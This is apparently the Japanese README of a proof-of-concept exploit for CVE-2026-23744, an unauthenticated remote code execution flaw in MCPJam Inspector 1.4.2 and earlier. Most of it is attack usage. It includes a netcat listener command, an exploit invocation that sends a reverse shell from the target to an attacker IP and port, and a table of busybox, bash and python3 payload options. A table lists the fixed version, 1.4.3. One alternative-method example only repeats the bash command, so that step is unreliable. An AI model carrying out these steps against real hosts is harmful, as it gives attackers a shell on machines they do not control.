
CVE-2026-23744 — MCPJam Inspector <= 1.4.2 における未認証のリモートコード実行(RCE)脆弱性の概念実証(PoC)エクスプロイト。
MCPJam Inspector <= 1.4.2 はデフォルトで 0.0.0.0 にバインドし、認証なしで /api/mcp/connect を公開します。このエンドポイントは serverConfig オブジェクトを受け入れ、ホスト上で直接プロセスを起動します — リバースシェルのペイロードを渡すと、認証情報なしで即座に RCE が成立します。
pip install requests
python3 exploit.py -u <target_url> -i <lhost> -p <lport> [-m <method>]
ステップ 1 — リスナーを起動:
nc -lvnp 4444
ステップ 2 — エクスプロイトを実行:
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash
ターゲット上で busybox が動作しない場合は、他の方式を試してください:
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash
| ソフトウェア | 脆弱なバージョン | 修正済みバージョン |
|---|---|---|
| MCPJam Inspector | <= 1.4.2 | 1.4.3 |
| フラグ | 説明 | デフォルト |
|---|
-u | ターゲット URL | 必須 |
-i | リスナー IP(LHOST) | 必須 |
-p | リスナーポート(LPORT) | 必須 |
-m | ペイロード方式: busybox、bash、python3 | busybox |